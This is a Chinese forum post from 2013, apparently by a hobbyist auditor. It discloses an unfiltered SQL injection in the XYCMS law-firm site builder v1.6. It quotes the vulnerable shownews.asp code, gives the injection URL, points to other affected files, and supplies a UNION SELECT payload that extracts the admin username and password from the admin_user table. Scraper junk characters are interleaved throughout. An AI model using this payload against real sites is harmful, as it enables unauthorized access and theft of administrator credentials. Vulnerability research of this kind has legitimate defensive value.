前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' j! ^8 |; D- {
0 L4 f: o" _7 j4 E2 `6 N2 H4 ~6 S
淫荡分割线
5 d/ m3 i/ u+ |1 D--------------------------------------------------------: l9 L2 s/ v& [7 @' S. n1 b
, [# p N! C, ]+ t, ]) g
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)1 b6 _6 W" Z: [- X; _8 m
源码地址:http://down.chinaz.com/soft/29233.htm/ w$ s& h$ A0 y' V! {( S2 D2 S
6 _5 H0 ]( G& K4 o漏洞文件:shownews.asp
. N' f% B: [8 V* K2 H漏洞代码:7-13行
( K- g/ h2 v# u! @+ U% n( D
_" K3 Q9 h" m- k( Z : T# m' n7 _, ]$ [. H1 X C
<%
+ `- Q8 R, z8 r8 I4 aid=request.QueryString("id")
0 R. O# Z, Z1 k* |& T
8 p, q: K; O0 dset snews=server.createobject("adodb.recordset")
, u) ?- H+ W3 f- m' sexec="select * from [news] where id="&id5 ^ Q7 f1 Y" T; R
snews.open exec,conn,1,1
0 i& V" I$ l" ^%>
9 ]8 P; c. k8 U6 s1 l4 ` & F9 m5 w& J" c
* j9 j6 r7 t7 i' k1 t4 h& \
什么过滤都没有 直造成注入
8 b' e; e5 O+ L$ v" L) A
( V0 Q/ s% s9 i1 X9 F% X注入点:http://127.0.0.1:99/shownews.asp?id=xx
' g6 ~3 o6 f7 Q% c: e8 ?
3 z! E& B1 A* S/ M. _1 u) X其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找: m1 O# A! x: L
2 G, _6 N+ m5 `9 ?: M& Y' X 0 y( j% p9 K+ q; e
exp: union select 1,admin,password,4,5,7 from admin_user
+ [6 R% n! `8 M6 @6 q& r5 u/ `" g0 L0 d
|
发表于 2013-4-4 17:28:12
收藏
支持
反对